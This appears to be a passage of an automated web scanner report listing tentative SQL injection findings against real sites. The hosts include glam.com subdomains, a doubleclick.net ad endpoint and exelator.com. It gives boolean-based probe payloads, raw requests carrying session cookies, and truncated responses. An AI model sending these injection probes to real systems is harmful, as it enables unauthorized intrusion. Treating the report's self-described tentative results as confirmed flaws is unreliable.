Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmc=234602824; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; __utmb=234602824

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 06:11:15 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026486407
Expires: Mon, 02 May 2011 13:11:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:11:18 GMT
Connection: close
Set-Cookie: PHPSESSID=qlmggolkpba4dpioent2dkb0u3; path=/
Content-Length: 21163

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://fashion.glam.com/' title='Fashion' style='color:white' onmouseover='showSubMenu(4)' onmouseout='hideSubMenu();' >Fashion</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://trends.glam.com/' title='Trends' onmouseover='showSubMenu(5)' onmouseout='hideSubMenu();'>Trends</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://runway.glam.com/' title='Runway' onmouseover='showSubMenu(6)' onmouseout='hideSubMenu();'>Runway</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://designers.glam.com/' title='Designers' style='color:white' onmouseover='showSubMenu(7)' onmouseout='hideSubMenu();' >Designers</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://shopping.glam.com/' title='Shopping' onmouseover='showSubMenu(8)' onmouseout='hideSubMenu();'>Shopping</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://beauty.glam.com/' title='Beauty' onmouseover='showSubMenu(9)' onmouseout='hideSubMenu();'>Beauty</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://hair.glam.com/' title='Hair' onmouseover='showSubMenu(10)' onmouseout='hideSubMenu();'>Hair</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://makeup.glam.com/' title='Makeup' onmouseover='showSubMenu(11)' onmouseout='hideSubMenu();'>Makeup</a></li><li class='LineSeperator 
sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://skinbody.glam.com/' title='Skin &amp;
...[SNIP]...

Request 2

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=183147941%20or%201%3d2--%20 HTTP/1.1
Host: designers.glam.com
Proxy-Connection: keep-alive
Referer: http://designers.glam.com/2011/04/29/royal-wedding-style-what-the-guests-wore/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmc=234602824; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; __utmb=234602824

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 13:11:20 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026486573
Expires: Mon, 02 May 2011 13:11:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:11:20 GMT
Connection: close
Set-Cookie: PHPSESSID=plo52m9qp2ib1qmtvfoeulgfn4; path=/
Content-Length: 2517

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'></ul></div> "; document.write(string);var string ="<div onmouseover='showme();' onmouseout='hideme();' class='SubNav'><div id='submenu_active' ><ul style='width:550px' class='topsubnav' id='glam-menus-plus'><li class=''><a href='http://trends.glam.com/' title='Trends'>Trends</a></li><li class=''><a href='http://runway.glam.com/' title='Runway'>Runway</a></li><li class=''><a href='http://designers.glam.com/' title='Designers' style='color:#D94275'>Designers</a></li><li class=''><a href='http://shopping.glam.com/' title='Shopping'>Shopping</a></li><li class=''><a href='http://fwi.glam.com/' title='Fashion Week Insider'>Fashion Week Insider</a></li></ul></div><style type='text/css'>._glam_search_button {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px 0; width: 55px; height: 20px;list-style:none} ._glam_search_twitter {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px -300px; width: 20px; height: 20px;} ._glam_search_facebook {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -495px; width: 20px; height: 20px;} ._glam_search_rss {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -1935px; width: 20px; height: 20px;}</style> <div class='SocialContainer'id='menusearch'><div class='SearchBox'><form role='search' name='searchform' method='get' id='searchform' action='http://www.glam.com' ><div class='search_controls'><input type='text' style='height:15px;' value='' name='search' id='search' /></div><div style='float:left;margin-top:3px;'><span onclick='javascript:document.searchform.submit();' style='cursor:pointer'><div class='_glam_search_button'></div></span></div></div> <ul class='social'> <a 
href='http://twitter.com/onglamfashion' target='_blank'><div class='_glam_se
...[SNIP]...

1.10. http://entertainment.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://entertainment.glam.com
Path:   /wp-content/plugins/menus-plus/javascriptmenu.php

Issue detail

The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 13805294%20or%201%3d1--%20 and 13805294%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=113805294%20or%201%3d1--%20 HTTP/1.1
Host: entertainment.glam.com
Proxy-Connection: keep-alive
Referer: http://entertainment.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmc=234602824; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=6rm62jkempskmr3oa1e4hontq6; __utmb=234602824

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 06:10:05 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026483796
Expires: Mon, 02 May 2011 13:10:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:10:07 GMT
Connection: close
Content-Length: 21013

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://fashion.glam.com/' title='Fashion' onmouseover='showSubMenu(4)' onmouseout='hideSubMenu();'>Fashion</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://trends.glam.com/' title='Trends' onmouseover='showSubMenu(5)' onmouseout='hideSubMenu();'>Trends</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://runway.glam.com/' title='Runway' onmouseover='showSubMenu(6)' onmouseout='hideSubMenu();'>Runway</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://designers.glam.com/' title='Designers' onmouseover='showSubMenu(7)' onmouseout='hideSubMenu();'>Designers</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://shopping.glam.com/' title='Shopping' onmouseover='showSubMenu(8)' onmouseout='hideSubMenu();'>Shopping</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://beauty.glam.com/' title='Beauty' onmouseover='showSubMenu(9)' onmouseout='hideSubMenu();'>Beauty</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://hair.glam.com/' title='Hair' onmouseover='showSubMenu(10)' onmouseout='hideSubMenu();'>Hair</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://makeup.glam.com/' title='Makeup' onmouseover='showSubMenu(11)' onmouseout='hideSubMenu();'>Makeup</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a 
href='http://skinbody.glam.com/' title='Skin &amp; Body' onmouseover='showSubMenu(12)' onmou
...[SNIP]...

Request 2

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=113805294%20or%201%3d2--%20 HTTP/1.1
Host: entertainment.glam.com
Proxy-Connection: keep-alive
Referer: http://entertainment.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmc=234602824; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=6rm62jkempskmr3oa1e4hontq6; __utmb=234602824

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 13:10:09 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026483878
Expires: Mon, 02 May 2011 13:10:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:10:09 GMT
Connection: close
Content-Length: 2388

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'></ul></div> "; document.write(string);var string ="<div onmouseover='showme();' onmouseout='hideme();' class='SubNav'><div id='submenu_active' ><ul style='width:550px' class='topsubnav' id='glam-menus-plus'><li class=''><a href='http://television.glam.com/' title='Television'>Television</a></li><li class=''><a href='http://music.glam.com/' title='Music'>Music</a></li><li class=''><a href='http://movies.glam.com/' title='Movies'>Movies</a></li><li class=''><a href='http://games.glam.com/' title='Games'>Games</a></li></ul></div><style type='text/css'>._glam_search_button {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px 0; width: 55px; height: 20px;list-style:none} ._glam_search_twitter {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px -300px; width: 20px; height: 20px;} ._glam_search_facebook {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -495px; width: 20px; height: 20px;} ._glam_search_rss {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -1935px; width: 20px; height: 20px;}</style> <div class='SocialContainer'id='menusearch'><div class='SearchBox'><form role='search' name='searchform' method='get' id='searchform' action='http://www.glam.com' ><div class='search_controls'><input type='text' style='height:15px;' value='' name='search' id='search' /></div><div style='float:left;margin-top:3px;'><span onclick='javascript:document.searchform.submit();' style='cursor:pointer'><div class='_glam_search_button'></div></span></div></div> <ul class='social'> <a href='http://twitter.com/onglamfashion' target='_blank'><div class='_glam_search_twitter'></div></a> <a 
href='http://www.facebook.com/pages/Glamcom/144180538945796?ref=ts' target='_blank'><d
...[SNIP]...

1.11. http://googleads.g.doubleclick.net/pagead/ads [num_ads parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The num_ads parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the num_ads parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-fairfax-watoday_js&output=js&lmt=1304358325&num_ads=4'&channel=National&region=default&ad_type=text&ea=0&oe=utf8&flash=10.2.154&url=http%3A%2F%2Fwww.watoday.com.au%2Fwa-news%2Fhunger-strike-starts-on-christmas-island-20110427-1dw45.html%3Ffrom%3Dsmh_ft&adsafe=high&dt=1304358340575&shv=r20110427&jsv=r20110427&saldr=1&correlator=1304358340600&frm=0&adk=511001906&ga_vid=1132403823.1304358341&ga_sid=1304358341&ga_hid=1598658957&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&eid=33895150&fu=0&ifi=1&dtd=30 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 12:50:42 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 21455

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...
ica.com/LP/0986607f354b447abb58ebd9e4ca88bf/a.aspx%3Frm_state%3Db%249ec973e97c8140bbb19f14a3efbea1fd%7Ce%240%7Cl%240%7Cu%24";
google_ad.visible_url = "www.SpringboardAmerica.com";
google_ad.line1 = "Illegal Immigrants:";
google_ad.line2 = "Should their kids become citizens?";
google_ad.line3 = "Share your opinion now!";
google_ad.regionname = "";
google_ads[11] = google_ad;
google_ad = new Object();
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-fairfax-watoday_js&output=js&lmt=1304358325&num_ads=4''&channel=National&region=default&ad_type=text&ea=0&oe=utf8&flash=10.2.154&url=http%3A%2F%2Fwww.watoday.com.au%2Fwa-news%2Fhunger-strike-starts-on-christmas-island-20110427-1dw45.html%3Ffrom%3Dsmh_ft&adsafe=high&dt=1304358340575&shv=r20110427&jsv=r20110427&saldr=1&correlator=1304358340600&frm=0&adk=511001906&ga_vid=1132403823.1304358341&ga_sid=1304358341&ga_hid=1598658957&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&eid=33895150&fu=0&ifi=1&dtd=30 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 12:50:43 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 21850

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...

1.12. http://living.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://living.glam.com
Path:   /wp-content/plugins/menus-plus/javascriptmenu.php

Issue detail

The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 19754759%20or%201%3d1--%20 and 19754759%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=119754759%20or%201%3d1--%20 HTTP/1.1
Host: living.glam.com
Proxy-Connection: keep-alive
Referer: http://living.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmc=234602824; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; __utmb=234602824

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 06:09:26 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026482305
Expires: Mon, 02 May 2011 13:09:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:09:28 GMT
Connection: close
Set-Cookie: PHPSESSID=ag4hl6r1apgqihobag3hpdfk51; path=/
Content-Length: 20993

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://fashion.glam.com/' title='Fashion' onmouseover='showSubMenu(4)' onmouseout='hideSubMenu();'>Fashion</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://trends.glam.com/' title='Trends' onmouseover='showSubMenu(5)' onmouseout='hideSubMenu();'>Trends</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://runway.glam.com/' title='Runway' onmouseover='showSubMenu(6)' onmouseout='hideSubMenu();'>Runway</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://designers.glam.com/' title='Designers' onmouseover='showSubMenu(7)' onmouseout='hideSubMenu();'>Designers</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://shopping.glam.com/' title='Shopping' onmouseover='showSubMenu(8)' onmouseout='hideSubMenu();'>Shopping</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://beauty.glam.com/' title='Beauty' onmouseover='showSubMenu(9)' onmouseout='hideSubMenu();'>Beauty</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://hair.glam.com/' title='Hair' onmouseover='showSubMenu(10)' onmouseout='hideSubMenu();'>Hair</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://makeup.glam.com/' title='Makeup' onmouseover='showSubMenu(11)' onmouseout='hideSubMenu();'>Makeup</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a 
href='http://skinbody.glam.com/' title='Skin &amp; Body' onmouseover='showSubMenu(12)' onmou
...[SNIP]...

Request 2

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=119754759%20or%201%3d2--%20 HTTP/1.1
Host: living.glam.com
Proxy-Connection: keep-alive
Referer: http://living.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmc=234602824; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; __utmb=234602824

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 13:09:29 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026482384
Expires: Mon, 02 May 2011 13:09:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:09:29 GMT
Connection: close
Set-Cookie: PHPSESSID=31diqlk4ss15a8tgiugnpnfui5; path=/
Content-Length: 2368

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'></ul></div> "; document.write(string);var string ="<div onmouseover='showme();' onmouseout='hideme();' class='SubNav'><div id='submenu_active' ><ul style='width:550px' class='topsubnav' id='glam-menus-plus'><li class=''><a href='http://food.glam.com/' title='Food &amp; Recipes'>Food &amp; Recipes</a></li><li class=''><a href='http://home.glam.com/' title='Home &amp; Design'>Home &amp; Design</a></li><li class=''><a href='http://travel.glam.com/' title='Travel &amp; Leisure'>Travel &amp; Leisure</a></li></ul></div><style type='text/css'>._glam_search_button {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px 0; width: 55px; height: 20px;list-style:none} ._glam_search_twitter {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px -300px; width: 20px; height: 20px;} ._glam_search_facebook {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -495px; width: 20px; height: 20px;} ._glam_search_rss {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -1935px; width: 20px; height: 20px;}</style> <div class='SocialContainer'id='menusearch'><div class='SearchBox'><form role='search' name='searchform' method='get' id='searchform' action='http://www.glam.com' ><div class='search_controls'><input type='text' style='height:15px;' value='' name='search' id='search' /></div><div style='float:left;margin-top:3px;'><span onclick='javascript:document.searchform.submit();' style='cursor:pointer'><div class='_glam_search_button'></div></span></div></div> <ul class='social'> <a href='http://twitter.com/onglamfashion' target='_blank'><div class='_glam_search_twitter'></div></a> <a href='http://www.facebook.com/pages/Glamcom/144180538945796?ref=ts' 
target='_blank'><div class='_gl
...[SNIP]...

1.13. http://loadus.exelator.com/load/ [p parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The p parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the p parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /load/?p=229'%20and%201%3d1--%20&g=001&c=927073&ag=&gd=&search=recipes&ctg=Entertainment&kw= HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxlyz0LwjAUheH%252Fkj2Q3Nx83U7adihoEavgVpo0xYLQodRF%252FO%252FajrodXs7TEdJrJkXsWhUs%252By4gJq3GEIwWBlTUIaEaYieCtlF5KXq%252F%252FqQktox924DAqs43aohFlUAbTNy6EDgOSfMgpOE%252BheSSE2iE%252BuW74rYmsMTyXdmU9d3Oj6Ua1WHSl%252FPUTtO8fx7%252F1KnekicGFlA5I6QHsA4NSMey9wcjUTpn; BFF=eJyllM1ShDAMx9%252BFJ2hLsVAuu%252BJBZqQyLsOsp509eva467tbWqamJQGVa39Jmq9%252FrlqU%252BvapeaGzk2CyNc2d8UNVVUVWf9hnxWpLc511r2Z4fnm%252FjO2pHbL6qmXxC0cGKQQigNRHBZIEGjiT3WQtZsAtKOZ38BTZ5ggwRBBD2UZB5oKPT%252Be54AdPSwEK9hQCEUDqowJJAr115wO3vysBQO7eEcuK8ZKzBBwfhyXI3Tu0DEMc4yFGNXmK1GRB6hOGOEJ7BQIJPOEfDoEEHy28FNix1agNFbVBvOCYBdUST%252BkxF0iezien8%252FQcydPFJPPszdo6Oorl2RtqHXtDfUO3w1H6G7Qdk89aOxzH2jHFjL2%252BVg8LekMkdTAgWByM%252F14H%252BgiQev%252B7vDfUTIt2U5%252B7ZLhDbTtEtUM7tEQ21LBj6Vd2%252Bxv6CtRQ; TFF=eJyVkzsSgyAURffiCt59onxsXEZaC4vMpEs6x70HEuMHeAYLR2TukXsEB8etm54O7Com1VOD3lrLVTc4dtPdofNXo8nf6Deck3wT8nWU5%252B77uOf0ipURfo7UMWl4Sar03eNtfAyvsRII5DQQ%252BrSU1d4tgUw%252BkVDLQhxxesXKiFBVCcla6MTIO%252BA8nzgg3Yi9g8dKic8hgemJONfMbM5%252BGPJqy8PaWrO0kfUJaQkm6SiTx47xQS7l2lJOr1gZ4edgrnQKx4yyP3H6vY950f0PJ7rHnF6xyyvhohHOjSA0g9jsSMxvAtxP0w%253D%253D; EVX=eJyFzjEOwyAMheG75ATvGShgDmNlZM5YcffaHaomqdTN0mfwv2vS59Teexm75pgxDmXTjaXCqgmyodDEuI2p%252FGiTUDYDxGApVC4ab0FXCU0%252FlKH%252B8%252FIIsBGewXPG%252FdB6Fz98Vf6t3ou%252Fm9Z6AY0CQKQ%253D

Response 1

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
